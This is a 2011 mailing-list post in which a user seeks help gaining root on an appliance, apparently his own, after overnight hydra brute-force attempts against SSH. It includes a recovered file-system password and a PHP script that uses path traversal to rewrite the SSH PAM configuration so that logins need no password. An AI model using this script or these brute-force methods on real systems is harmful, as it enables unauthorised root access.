Is it possible to extract the root password from the file system?

Mark Phillips mark at phillipsmarketing.biz
Sun Jul 17 08:58:58 MST 2011

On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold <lisakachold at obnosis.com>wrote:

> There are alot of password files and dictionary lists on various sites.
> Backtrack5 contains a good number.
>
> But I imagine that it's either not allowing root via ssh or you have the
> wrong username.

It turns out the box is smarter than a fifth grader.....after a few hydra
attacks, it started rejecting all the hydra attempts to ssh in via root.
Once I stopped hydra (after running all night), it took a couple of hours
before it would respond to ssh attempts from root. It now will ask for the
root password, but I still have no idea what it is.

> Or it's a truely random string.

It could be....the password for the zip file to unzip the file system is

 YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4

. Someone retrieved it using a disassembler on the file system.

I did some more reading, and one person was able to use php to allow ssh
login. The box allows one to create a web space, and it comes with php
installed. One can edit the php.ini file, and I can upload via ftp a php
script. The script they suggested is:
<?php
$file = '../../../../etc/pam.d/sshd';
$fh=fopen($file, 'w') or die("can't open file");
$stringData = "account  required   pam_unix.so\n";
fwrite($fh, $stringData);
$stringData = "session  required   pam_unix.so\n";
fwrite($fh, $stringData);
$stringData = "auth required pam_permit.so\n";
fwrite($fh, $stringData);
fclose($fh);
?>

I uploaded the script, but I get a 404 File not Found when I access the
page. I thought it might be a file permission error since the file is only
rw. I tried chmod 777 at the ftp prompt, and got the error message File not
Found, but ls shows it is there.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   2 apache   apache          6 Jul 17 08:23 cgi-bin
drwxrwxrwx   2 apache   apache         22 Jul 17 08:23 htdocs
drwxrwxrwx   2 apache   apache         39 Jul 17 08:23 log
-rw-rw-rw-   1 hammerhead hdusers       335 Jul 17 08:49 script.php
226 Transfer complete
ftp> chmod 777 script.php
550 CHMOD 777 script.php: No such file or directory
ftp>

Is there anything I can change in the php.ini file to make this script
execute? Or, am I missing something else?

BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.

Thanks,

Mark